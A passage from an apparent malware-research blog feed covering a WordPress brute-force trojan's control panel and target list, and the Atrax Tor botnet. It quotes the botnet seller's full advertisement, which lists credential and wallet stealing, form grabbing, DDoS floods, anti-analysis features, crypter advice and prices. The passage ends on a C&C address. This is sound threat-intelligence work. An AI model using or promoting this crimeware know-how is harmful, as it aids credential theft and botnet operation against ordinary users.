&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxsZoKbtZ58S8gTFaVsicO0DZ1InXdP0So51gPbLQ96H28IsUs1hkEXZKO9zGh959tPJNaQtTIw7UA2Cfk0_jv8xV2mg9LiYiUgRDfXMd6yRSvzjGbzIlnpSSbhkRhE2UMu95X9rESJ-w/s1600/29-11-2013+10-52-04.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;145&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxsZoKbtZ58S8gTFaVsicO0DZ1InXdP0So51gPbLQ96H28IsUs1hkEXZKO9zGh959tPJNaQtTIw7UA2Cfk0_jv8xV2mg9LiYiUgRDfXMd6yRSvzjGbzIlnpSSbhkRhE2UMu95X9rESJ-w/s400/29-11-2013+10-52-04.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Broken wordpress:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvRdSzz81Iyp3hlBtRkTSOVOzeYEAQHfkN65a_WoMTAcMavsHmUOi-ANyDsB3ad_0Acn5QSD3jkodgxpzeVFwtONHUwrp_g7PpsDIjcCYpU6OWStwFKXyBkQ-cvm0LS_JAGXY69qXB5bk/s1600/29-11-2013+10-46-23.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;250&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvRdSzz81Iyp3hlBtRkTSOVOzeYEAQHfkN65a_WoMTAcMavsHmUOi-ANyDsB3ad_0Acn5QSD3jkodgxpzeVFwtONHUwrp_g7PpsDIjcCYpU6OWStwFKXyBkQ-cvm0LS_JAGXY69qXB5bk/s400/29-11-2013+10-46-23.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Statistics:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVidi5veGZJZeSVLVLh2CfSkqW4pBZbEqxsYYkJFcCtQ14__jcfaO9UesntYYq5HKbQlwiU_V0rXJxLc2pOG01ZVR2YVSRTJvNxBpZW0VEoY0k3t6T4KAGNnqciFWE4NV0P8x3Xo6u9I0/s1600/29-11-2013+10-33-41.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;250&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVidi5veGZJZeSVLVLh2CfSkqW4pBZbEqxsYYkJFcCtQ14__jcfaO9UesntYYq5HKbQlwiU_V0rXJxLc2pOG01ZVR2YVSRTJvNxBpZW0VEoY0k3t6T4KAGNnqciFWE4NV0P8x3Xo6u9I0/s400/29-11-2013+10-33-41.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Add domains:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEm13Udez7ORKpxEOa94uCUrByigjJCt7YX2d1DtLni1bESkjA9xe8sEjJtQ2qIslSqLT88rnK-zSH9-bGXZOR64hF3P9ogVqFPCuD5iK6i1yq9le_MHCmQxIMUt0UgqIEqqd7ZUYTbUY/s1600/29-11-2013+10-29-50.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;145&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEm13Udez7ORKpxEOa94uCUrByigjJCt7YX2d1DtLni1bESkjA9xe8sEjJtQ2qIslSqLT88rnK-zSH9-bGXZOR64hF3P9ogVqFPCuD5iK6i1yq9le_MHCmQxIMUt0UgqIEqqd7ZUYTbUY/s400/29-11-2013+10-29-50.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Add admin panels:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl1iqpkeH_WqNBbPdNmd4mU9y6fcZvgGZAIXyToZC9BD5TGzicwQaENMG5qlNExWKIZFat_v11X8GLuCGOH8ARMdty66pGIeKjpqXo0wZd39k_THMO3EV_vVy1eCHcRA1sN3b147ZT9gs/s1600/29-11-2013+10-38-33.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;137&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl1iqpkeH_WqNBbPdNmd4mU9y6fcZvgGZAIXyToZC9BD5TGzicwQaENMG5qlNExWKIZFat_v11X8GLuCGOH8ARMdty66pGIeKjpqXo0wZd39k_THMO3EV_vVy1eCHcRA1sN3b147ZT9gs/s400/29-11-2013+10-38-33.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Add logins:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0vaTJWUH5NEQkpYNOQ6YEpyWXSAGfZ8GBDPe9G9pFjPpVFKSSalbIjf4-17Fn2W-zgelOpFzNb6nwevojoiVF5Vhxz5dUrc8NzqW6W75qwvACiwQrRqkpG2_7c5WfqfII0BRgU3UWIio/s1600/29-11-2013+10-39-46.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;137&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0vaTJWUH5NEQkpYNOQ6YEpyWXSAGfZ8GBDPe9G9pFjPpVFKSSalbIjf4-17Fn2W-zgelOpFzNb6nwevojoiVF5Vhxz5dUrc8NzqW6W75qwvACiwQrRqkpG2_7c5WfqfII0BRgU3UWIio/s400/29-11-2013+10-39-46.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Add passwords:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh88LiRBpS6M3cjg5VUF_8mQEqMxSeY1vjvicYUk7dyoGRe0eNGq7o4fbCMjt5ywzAFzb6cTRAMULflcNcB6OtFM1iACMN4niwa13FzCMQ7P6LEZWrUPMXrZMYP15KVndZUJOnCkLekBIc/s1600/29-11-2013+10-40-30.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;137&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh88LiRBpS6M3cjg5VUF_8mQEqMxSeY1vjvicYUk7dyoGRe0eNGq7o4fbCMjt5ywzAFzb6cTRAMULflcNcB6OtFM1iACMN4niwa13FzCMQ7P6LEZWrUPMXrZMYP15KVndZUJOnCkLekBIc/s400/29-11-2013+10-40-30.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Add module for jm(zip):&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcg9M9AyScL1cRIRRrF3PkO46UvyXziYTMT0vaaPPsf-U_Wb6VUIHoNwN5NY5gFUWJqxWL2qi0f2LzhzqffDNW7p_OvcwUcD6jxTpA3zmWLhago_ks8UT6XwwiLnCKdVFFKXqXUAfTY0I/s1600/29-11-2013+10-43-49.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;137&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcg9M9AyScL1cRIRRrF3PkO46UvyXziYTMT0vaaPPsf-U_Wb6VUIHoNwN5NY5gFUWJqxWL2qi0f2LzhzqffDNW7p_OvcwUcD6jxTpA3zmWLhago_ks8UT6XwwiLnCKdVFFKXqXUAfTY0I/s400/29-11-2013+10-43-49.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Add module for wp(zip):&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc7MNzu7ZN6e7n8J3UQvGTWAlrWF_mMIstFyMJjva5vFeyJolgTMIbLcPnsMWWdmU77KQ2cnjc8cED632lodHBW01uOMakha5FavNx-ONCAnUao8tC5XhQ59hm-llp2rAvB9St4ZgZ7uw/s1600/29-11-2013+10-44-35.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;137&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc7MNzu7ZN6e7n8J3UQvGTWAlrWF_mMIstFyMJjva5vFeyJolgTMIbLcPnsMWWdmU77KQ2cnjc8cED632lodHBW01uOMakha5FavNx-ONCAnUao8tC5XhQ59hm-llp2rAvB9St4ZgZ7uw/s400/29-11-2013+10-44-35.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Add shell jm(php):&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0pkN8sbnAuz-C8JCH1_0GIwGaAasoPlnyUZ1DmsAiHazi9mRSqm0X9nlooe_VrXBewi2ubU0X2-rXNMOZaoq_plhqc3rNyJGYclO741iOilY7mq7tAulZysOg0cBS4JjrVS2BM2qry7A/s1600/29-11-2013+10-45-21.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;137&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0pkN8sbnAuz-C8JCH1_0GIwGaAasoPlnyUZ1DmsAiHazi9mRSqm0X9nlooe_VrXBewi2ubU0X2-rXNMOZaoq_plhqc3rNyJGYclO741iOilY7mq7tAulZysOg0cBS4JjrVS2BM2qry7A/s400/29-11-2013+10-45-21.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Cron brute:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD9O_7oT4XiBVNKUe2DpSXgseTqoSZASpN-MHpSKeZFMCdwoCcDKtgw1FNXparWBSqOIsiA2OkC4m4BOZQdOuG7Ut-DkYpq60QurbsucGUBd8Il8EhZQm_yivc4m0OD1BwOMYJXF8cZF0/s1600/29-11-2013+10-31-31.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD9O_7oT4XiBVNKUe2DpSXgseTqoSZASpN-MHpSKeZFMCdwoCcDKtgw1FNXparWBSqOIsiA2OkC4m4BOZQdOuG7Ut-DkYpq60QurbsucGUBd8Il8EhZQm_yivc4m0OD1BwOMYJXF8cZF0/s1600/29-11-2013+10-31-31.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Ban list:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhheHjdF0PmMVqgD8wyboHt0XFFPXlC485cmpyclOMK7Cqzkygy7evsPZ7cFAVH4QEqOJFH8FNBNipX4lzBf0nyLbBSqTPKEGkvL3GCW-lKxFunFTEzT6l35cGJwVjIGIlWGARZ7FqxY8k/s1600/29-11-2013+10-59-22.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhheHjdF0PmMVqgD8wyboHt0XFFPXlC485cmpyclOMK7Cqzkygy7evsPZ7cFAVH4QEqOJFH8FNBNipX4lzBf0nyLbBSqTPKEGkvL3GCW-lKxFunFTEzT6l35cGJwVjIGIlWGARZ7FqxY8k/s1600/29-11-2013+10-59-22.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Logs:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje9VrxYBXe6mA2RxLa2GALJkBegFaBnjLco-IzJL45AdkVm2OMLhrDxfijQvfGD1BKcmRMSnqY_EPEOtfMwYWV_0ve1zTmVjUSskHx3RNjKPCktPBQGfOVAwm4s0jm0QABhLnkfVWqqdU/s1600/29-11-2013+10-59-14.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;161&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje9VrxYBXe6mA2RxLa2GALJkBegFaBnjLco-IzJL45AdkVm2OMLhrDxfijQvfGD1BKcmRMSnqY_EPEOtfMwYWV_0ve1zTmVjUSskHx3RNjKPCktPBQGfOVAwm4s0jm0QABhLnkfVWqqdU/s400/29-11-2013+10-59-14.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Domains list (downloaded by the malware to know wich wordpress he should brute force):&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg91z1azin6oHbP0r6LPmGW2Jkb2qWGhyCd7TPopjG450LsUGrTVX6PrzhEST2Gxz-QcicdZeOHwNfO88djFfUt-StfYBDVjlzs9oZOCm8_oAvRnXDJ5WEfUFVr-GLFu0xpfUrw356MvLE/s1600/29-11-2013+12-06-51.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;280&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg91z1azin6oHbP0r6LPmGW2Jkb2qWGhyCd7TPopjG450LsUGrTVX6PrzhEST2Gxz-QcicdZeOHwNfO88djFfUt-StfYBDVjlzs9oZOCm8_oAvRnXDJ5WEfUFVr-GLFu0xpfUrw356MvLE/s400/29-11-2013+12-06-51.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
36k urls.&lt;br /&gt;
&lt;br /&gt;
Roman of abuse.ch have also wrote an &lt;a href=&quot;http://www.abuse.ch/?p=5813&quot;&gt;interesting post&lt;/a&gt; about this threat.</description><link>https://www.xylibox.com/2013/12/win32bruteforcewp.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhba5AHWCiGu093SXDO_TV8hw0FYYJkFfJONM-_oSZ0Yzdt6rtcUYef_fi-nwFcPKfCZdtWZrovMKWTSr_c56p_0nSP1vu55R-aPUjS8eofwT3w_VYV2LIvp7EAESJmYGYrZf8Dd_E_nO4/s72-c/06-12-2013+15-33-39.png" height="72" width="72"/><thr:total>7</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-4957210004222454637</guid><pubDate>Fri, 06 Dec 2013 19:03:00 +0000</pubDate><atom:updated>2013-12-07T12:42:13.694+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Atrax</category><category domain="http://www.blogger.com/atom/ns#">Atrax Botnet</category><category domain="http://www.blogger.com/atom/ns#">TOR</category><category domain="http://www.blogger.com/atom/ns#">TOR Botnet</category><category domain="http://www.blogger.com/atom/ns#">Win32/Atrax.A</category><title>Win32/Atrax.A</title><description>Atrax is a TOR botnet, you can read about it on the &lt;a href=&quot;http://www.welivesecurity.com/2013/07/24/the-rise-of-tor-based-botnets/&quot;&gt;excellent post&lt;/a&gt; of Aleksandr.&lt;br /&gt;
Someone on kernelmode.info posted recently a fresh sample:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBHg4b43TgJY4MUbfXN2W49jworAMSYm2Nlv4BdGoTvRqeA5uTyJWgtoOYjaiL4bSonjZiilsvogG4bHjCuqXbmDo5iCy_bGvWOszI4PPfgCQm3JkWFmCxDAipdahoZFKVGudoeMaoYgc/s1600/06-12-2013+18-07-59.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;123&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBHg4b43TgJY4MUbfXN2W49jworAMSYm2Nlv4BdGoTvRqeA5uTyJWgtoOYjaiL4bSonjZiilsvogG4bHjCuqXbmDo5iCy_bGvWOszI4PPfgCQm3JkWFmCxDAipdahoZFKVGudoeMaoYgc/s400/06-12-2013+18-07-59.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
MD5: &lt;a href=&quot;https://www.virustotal.com/en/file/9b8cdbd216044d13413efee6c20c5da080da30a9aacabeeeb5cea66e96104645/analysis/1386353583/&quot;&gt;44a6a7d4a039f7cc2db6e85601f6d8c1&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Fun things also, the coder leaved a message:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNncSfDyWj-GgS8Bi60Ij9DvRD9VsW9hviGQFDaS8pPopHPdbFl1fFenDiFj8MNwaA_WCmiYqcMHME-dnzcWPtnAJlnDhSaWOBYp0OaTJAzLe2B3zRqYASfITVmivlGFKZhz8mvI3lp7M/s1600/06-12-2013+18-15-35.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;72&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNncSfDyWj-GgS8Bi60Ij9DvRD9VsW9hviGQFDaS8pPopHPdbFl1fFenDiFj8MNwaA_WCmiYqcMHME-dnzcWPtnAJlnDhSaWOBYp0OaTJAzLe2B3zRqYASfITVmivlGFKZhz8mvI3lp7M/s400/06-12-2013+18-15-35.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&quot;Nice blog post ESET 2013/07/24 Greetz to KernelMode.info&quot;&lt;br /&gt;
&lt;br /&gt;
Atrax advertising:&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
Programming language: C (No C++!)&lt;br /&gt;
OS: Win XP - 8.1 (all x86/x64)&lt;br /&gt;
Admin rights required: No&lt;br /&gt;
Special: Tor Integration, spawns no process -&amp;gt; x64/x86 Process injection, this is the first public bot which supports windows 8!&lt;br /&gt;
File size: ~1,2 MB (because of Tor integration and x64/x86 Code), you can get a free assembler web downloader ~2KB&lt;br /&gt;
&lt;br /&gt;
Why Tor?&lt;br /&gt;
The bot communicates only via Tor with your panel. With Tor you can get a really nice anonymous Botnet. It is almost impossible (well, theoretically it is possible, but Silkroad is still online, so don’t worry) to get your server ip and put your server down. You get a Tor onion domain and this domain cannot be blacklisted (lasts “forever”). So to sum up: If you don’t do any configuration mistakes, your botnet will probably last very long.&lt;br /&gt;
You need a VPS or a dedicated server to host this tor botnet, because you need to set up a hidden service. Because of tor the botnet is consuming more hardware resources than typical botnets. Probably it is not possible to get a 10 Dollar/year VPS and trying to host over 1k victims.&lt;br /&gt;
&lt;br /&gt;
Setting up hidden service instructions:&lt;br /&gt;
- https://www.torproject.org/docs/tor-hidden-service.html.en&lt;br /&gt;
- http://kendildonic.wordpress.com/2011/08/03/build-a-tor-hidden-service-onion-web-site-with-a-cheap-vps/&lt;br /&gt;
- A little manual to set it up on debian based linux systems is included&lt;br /&gt;
&lt;br /&gt;
The bot consist of a core and various plugins/addons. Each plugin/addon costs some money. Every plugin also communicates over tor.&lt;br /&gt;
(If somebody is interested in developing a plugin -&amp;gt; contact me)&lt;br /&gt;
&lt;br /&gt;
Some basic features:&lt;br /&gt;
- Autostart, Persistence&lt;br /&gt;
- x86/x64 Code, x86/x64 Injection with Heavens Gate technique&lt;br /&gt;
- Anti-Analyzer (Protection against e.g. anubis.iseclab.org, malwr.com)&lt;br /&gt;
- If you need: Anti-VM (Please request it explicitly)&lt;br /&gt;
- Anti-Debug/Anti-Hook Engine&lt;br /&gt;
- Doesn&#39;t use suspicious windows apis like GetProcAddress/GetModuleHandle&lt;br /&gt;
- Plugins are saved to disk with AES-128-CBC encryption (random key)&lt;br /&gt;
- Communication over tor is already encrypted, so no extra communication encryption&lt;br /&gt;
- Every Plugin and the core is watermarked. Leak -&amp;gt; No updates/support. (All updates are free)&lt;br /&gt;
- Everything UNICODE&lt;br /&gt;
&lt;br /&gt;
Panel:&lt;br /&gt;
- http://www0.xup.in/exec/ximg.php?fid=11907674&lt;br /&gt;
- http://www0.xup.in/exec/ximg.php?fid=68935688&lt;br /&gt;
- http://www0.xup.in/exec/ximg.php?fid=20127007&lt;br /&gt;
- http://pixs.ru/showimage/2ci7png_4898170_9693543.png&lt;br /&gt;
- http://pixs.ru/showimage/ekahjpg_4965220_9693535.jpg&lt;br /&gt;
- Login Bruteforce protection, panel will be locked after x failed logins (captchas are not secure)&lt;br /&gt;
- SQL-Injection proof&lt;br /&gt;
- No IonCube&lt;br /&gt;
&lt;br /&gt;
Standard Features:&lt;br /&gt;
- Kill&lt;br /&gt;
- Update&lt;br /&gt;
- Download (over Tor), Execute (Commandline-Parameter allowed)&lt;br /&gt;
- Download (over Tor), Execute (Commandline-Parameter allowed) in memory (Your file doesn&#39;t need to be FUD)&lt;br /&gt;
- Install Plugin&lt;br /&gt;
- Installation List (A list with all installed applications)&lt;br /&gt;
&lt;br /&gt;
The Core has only a few functions, but they are already pretty useful. Yes you can e.g. start your own uncrypted Bitcoin Miner with the &quot;Download over Tor, Execute Memory&quot; function.&lt;br /&gt;
I will give you a plain bitcoin miner exe or just use the binaries you can find in this board.&lt;br /&gt;
&lt;br /&gt;
A bot addon is integrated in the main EXE, so no extra file.&lt;br /&gt;
A bot plugin is not integrated, you will receive extra file(s).&lt;br /&gt;
&lt;br /&gt;
Addon - DDOS:&lt;br /&gt;
- Full IPv6 ´+ IPv4 support.&lt;br /&gt;
- UDP Flood&lt;br /&gt;
- TCP Flood&lt;br /&gt;
- TCP Connect Flood (Some idiots call this &quot;SYN-Flood&quot;)&lt;br /&gt;
- HTTP Slowloris (based on http://ckers.org/slowloris/)&lt;br /&gt;
- HTTP RUDY (R-U-Dead-Yet, based on https://code.google.com/p/r-u-dead-yet/)&lt;br /&gt;
- HTTP File Download (Good if your target hosts a file &amp;gt;1MB)&lt;br /&gt;
- If you need some more methods, contact me.&lt;br /&gt;
&lt;br /&gt;
Addon - Form Grabber:&lt;br /&gt;
- Firefox, Internet Explorer x86/x64, Chrome SSL HTTP POST Grabber&lt;br /&gt;
- Anti-Hook Engine (Removes hooks from other bots)&lt;br /&gt;
- Own Hook Engine (No copy/paste crap)&lt;br /&gt;
- Tested with Browser: Internet Explorer v7/v9/v10, Firefox v11/v21/v22/v24, Chrome v27/v30&lt;br /&gt;
- Tested with Website: PayPal, Amazon, Bitcoin.de, Mt. Gox, eBay, Googlemail, vBulletin Boards&lt;br /&gt;
- SPDY v3 support&lt;br /&gt;
- IE 7/8/9/10 (Enhanced) Protected Mode Support&lt;br /&gt;
- Grabs only important POST Form Requests.&lt;br /&gt;
- Searches automatically for Username/Password/Email and CC (Possible CC will be displayed in panel)&lt;br /&gt;
- Screenshot: http://www0.xup.in/exec/ximg.php?fid=24471254&lt;br /&gt;
&lt;br /&gt;
Addon - Socks 5 Reverse Socks:&lt;br /&gt;
- You need a 2nd VPS/dedicated Server to keep your main C&amp;amp;C server secure!&lt;br /&gt;
- Server is a Java application to achieve complete platform independence -&amp;gt; All OS supported!&lt;br /&gt;
- Socks 5 with and without authentication&lt;br /&gt;
- Controlled via tasks&lt;br /&gt;
- You can run different instances of the proxy sever for different purposes&lt;br /&gt;
- Works on all clients because it is a reverse socks (No SSH crap!)&lt;br /&gt;
- Panel screenshot: http://www0.xup.in/exec/ximg.php?fid=15537396&lt;br /&gt;
&lt;br /&gt;
Plugin - Stealer:&lt;br /&gt;
- Steals all current browser versions.&lt;br /&gt;
- Steals: CHROME, FIREFOX, SAFARI, INTERNET EXPLORER, OPERA, FILEZILLA, PIDGIN, JDOWNLOADER v1 + v2, GIGATRIBE, THUNDERBIRD, WINDOWSKEY, FLASHFXP, ICQ, MSN, WINDOWS LIVE, OUTLOOK, PALTALK, STEAM Username Only, TRILLIAN, MINECRAFT, DYNDNS, SMARTFTP, WSFTP, Bitcoin Wallet (Armory, Bitcoin-Qt, Electrum, Multibit)&lt;br /&gt;
- If you need something more -&amp;gt; ask me.&lt;br /&gt;
- Special: JDownloader v1/v2, Bitcoin Wallet Stealer (whole wallet.dat will be uploaded), IE10 + IE11 support!&lt;br /&gt;
&lt;br /&gt;
Plugin - Coin Mining (Experimental)&lt;br /&gt;
- Bitcoin / Litecoin Miner&lt;br /&gt;
- Hash Rate displayed in panel&lt;br /&gt;
- Based on Ufasoft Miner v0.68 (updated regularly)&lt;br /&gt;
- Mining with tasks http://www0.xup.in/exec/ximg.php?fid=60729560&lt;br /&gt;
&lt;br /&gt;
Price:&lt;br /&gt;
Core: $250 (Launch price! Read information below)&lt;br /&gt;
Addon DDOS: $90&lt;br /&gt;
Addon Form Grabber: $300&lt;br /&gt;
Addon Reverse Socks: $400&lt;br /&gt;
Plugin Stealer: $110&lt;br /&gt;
Plugin Coin Mining: $140 (Experimental)&lt;br /&gt;
&lt;br /&gt;
Payment only with Bitcoin. Market price from https://www.bitcoin.de &quot;Current Bitcoin price&quot; - 10%, because of high exchange rate fluctuations!&lt;br /&gt;
Bugfix Updates and Support is free of course.&lt;br /&gt;
Please keep in mind: This Core Price will be higher soon. This Bot is currently in beta stage, so probably there are still some bugs. Get it now pay less + maybe bugs, wait: pay more and bot is stable&lt;br /&gt;
&lt;br /&gt;
- Builder available?&lt;br /&gt;
No, your tor domain will last forever if you don&#39;t lose the RSA key.&lt;br /&gt;
&lt;br /&gt;
- Is the bot bin FUD?&lt;br /&gt;
No, you need a crypter. This bot should work with all crypters, but .NET Crypters are special. Tell me what .NET crypter you want to use and we will see.&lt;br /&gt;
I can give you a free .NET Crypter to get you started!&lt;br /&gt;
&lt;br /&gt;
- The bot is too expensive, noob!&lt;br /&gt;
I don&#39;t care if you think it is too expensive.&lt;br /&gt;
&lt;br /&gt;
- The filesize sucks, noob!&lt;br /&gt;
I don&#39;t care.&lt;/div&gt;
&lt;br /&gt;
Alright, let&#39;s have a look on the C&amp;amp;C of the sample posted on kernelmode.&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
estrgnejb7sjly7p.onion &amp;gt;&amp;gt; 46.183.219.xxx&lt;/div&gt;
The httpd is not properly configured to run with the IP&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
